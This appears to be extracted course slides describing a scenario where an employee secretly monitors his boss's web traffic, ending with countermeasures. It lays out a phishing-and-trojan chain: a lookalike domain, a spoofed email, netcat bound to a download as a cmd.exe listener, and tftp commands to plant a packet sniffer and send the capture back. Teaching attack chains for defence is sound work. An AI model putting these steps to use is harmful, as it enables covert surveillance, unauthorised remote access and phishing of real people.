TEL 283What’s the Boss viewing?

The Boss established a new policy against surfing the web during work hours

Phoenix decides to examine the sites that the Boss is looking at by spying on him

Policy

The networked machines are connected via a switch◦ Private 192.168.1.0 network

Boss’ IP: 192.168.1.5 Phoenix’s IP: 192.168.1.6

Setup

Monitor traffic to and from the Boss’ machine

How “loud” should this approach be?◦ Loud/noisy means that could trigger alarms of

IDS/IPS systems Might be reasons to launch a noisy attack

Provide a distraction to another attack Sometimes it’s the only way to monitor traffic

Since a single host’s traffic is the target, ARP poisoning, MAC spoofing or MAC flooding will not be done

The Plan

“Loud” methods◦ Gratuitous ARP for individual hosts

ARP Poisoning◦ MAC spoofing◦ MAC flooding◦ SPAN

Port mirroring

Viewing Switched Network Traffic

Gratuitous ARP◦ Unsolicited ARP

Protocol allows for it, without checking for the ARP request (stateless!)

ARP reply sent out associating the target’s IP with the collector’s MAC address

Spoof the MAC of the gateway◦ Collector replies to ARP requests for the gateway’s MAC◦ Switch will see the router’s MAC address on both switch

ports will send outbound traffic to both ports MAC flooding

◦ Overwhelm the switch’s MAC table Causes the switch to “failover” into hub mode

MACOF (http://monkey.org/~dugsong/dsniff/)

Viewing Switched Network Traffic

Capture the traffic on the target host itself◦ Plant WinPCap and Trojan Horse on the host

The trick will be to install the software on the target host◦ Boss will not blindly install software

Have to convince him it’s something of value to him The plan consists of a chained series of

exploits

Quieter method

Copy a web site and host it on Phoenix’s server Bind Netcat to a legitimate executable file Send email to boss

◦ Download the free executable Netcat will also be downloaded and installed

Connect to boss’ machine using Netcat Use TFTP and download a WinDump program

onto boss’ machine Capture the boss’ network traffic Analyze captured traffic Rebuild a jpg image using a hex editor

The Plan

Phoenix locates a site and plans to get his boss to visit a copied version of the site◦ Lays the groundwork via some social engineering

Tells boss of a site “certificatepractice.com” which offers free CCNA practice exam as a promotional offer

◦ Uses a utility to download and mirror the site Wget (www.gnu.org/software/wget) Copy the site recursively to hard drive, with

appropriate level of hyperlinks of the 1st page Will also copy the practice test executable

Phoenix will bind his Trojan to this executable

Phishing Scam

Trojan wrapper program is used◦ YAB (Yet Another Binder)

Areyoufearless.com (no longer there, however can get via BitTorrent sites) Altavista.net Packetstormsecurity.org

Add Bind File option Allows Phoenix to bind nc.exe

Will execute nc (asynchronously is possible) Can add execution parameters when nc starts up

Np 50 –e cmd.exe –L Registry startup option available (default is no) Melt stub option

Will remove netcat after execution Icon can be added to make the install appear legitimate

Binding the Trojan

Overwrite the original ccna.exe file with the bound Trojan file in the phony site

Register a very similar domain name◦ “certification-practice.com”

Send an email to victim◦ Phoenix uses an anonymous e-mailer and spoofs

the email header to have the “From:” appear as the real site www.mail.com

Doesn’t require a “real” email address to register Victim would have to read the email message headers

in order to see the real source domain

Setting up the phishing site

Check for spelling and grammatical errors Offer something free or trial basis Appeal to greed

◦ Why victim is getting something for nothing Lower suspicion

Appeal to victim’s sense of self◦ Self-help tools, adding to success, etc

Brevity Text of the email contains the link to the site

◦ Appears as the URL of the real site, but the hyperlink is really the phony site

Present the email to the victim◦ Possibly prepare the victim for the email, adding to the

enticement

Email

Angry IP Scanner◦ www.angryziber.com/ipscan/

Scan IP’s on the network for the IP with port 50 open and listening

Obtain the Vic’s IP address

nc to the victim’s machine on port 50 Verify the connection using ipconfig

◦ Will show the victim machine’s IP in the nc window

Connect to the victim machine

Use command line utility◦ nc does not allow for usage of a GUI (Windows) interface

Sysinternals has a TFTP server available◦ Free◦ No configuration required◦ Windows already has a TFTP client!

Windump is downloaded◦ www.winpcap.org/windump◦ Placed into the default TFTP server directory (TFPT-Root)

Phoenix sets up a TFTP server on his machine Using Netcat, Phoenix types

tftp –i 192.168.1.6 get windump.exe windump.exetftp [-i] host [put | get] source destination

-i switch use binary transfer

Install packet capture software

Options◦ -c count (packets)◦ -s snaplength (length of packets captured)◦ -w filename (of captured packets)

windump –c 500 –s 1500 –w capture.log

If the victim does not have winpcap installed, Phoenix must transfer and manually install winpcap on victim machine◦ Windump requires winpcap

Run Windump

Phoenix downloads winpcap Unzips it TFTP (to victim’s winpcap directory)

◦ Daemon_mgm.exe◦ NetMonInstaller.exe◦ Npf_mgm.exe◦ Rpcapd.exe◦ Uninstall exe

ExecuteNpf_mgm.exe –rDaemon_mgm.exe –rNetMonInstaller.exe i

Installing winpcap

Using Netcattftp –I put 192.168.1.6 capture.log

Use a packet analyzer to view the traffic◦ Wireshark

A review show sites visited by the victim◦ Includes a GET (HTTP) for a file called “gambling.jpg”

Follow TCP stream◦ Capture the output as raw data◦ Use a hex editor (WinHex), if required, to edit the raw data

Remove everything before the actual binary file (HTTP commands, etc)

Leaves just the actual binary of the image Jpg starts with ÿØÿà

Analyzing the capture log

Anonymous note left on the victim’s desk highlighting the activity

Internet usage policy relaxed the next day

Finale

Phishing◦ Training!◦ Spam filters / phishing filters

Trojan horse◦ Anti-virus software

Latest signatures◦ However

Organizations will alter the Trojan (for a price) so that it does not match a signature EliteC0ders (no longer offers this “service”)

◦ Software policy◦ Sniffing

Port security on switches Protects against ARP poisoning, MAC spoofing and MAC flooding

IPS PromiScan Host based IDS

Cisco Secure Agent Warns if new application is launching

Countermeasures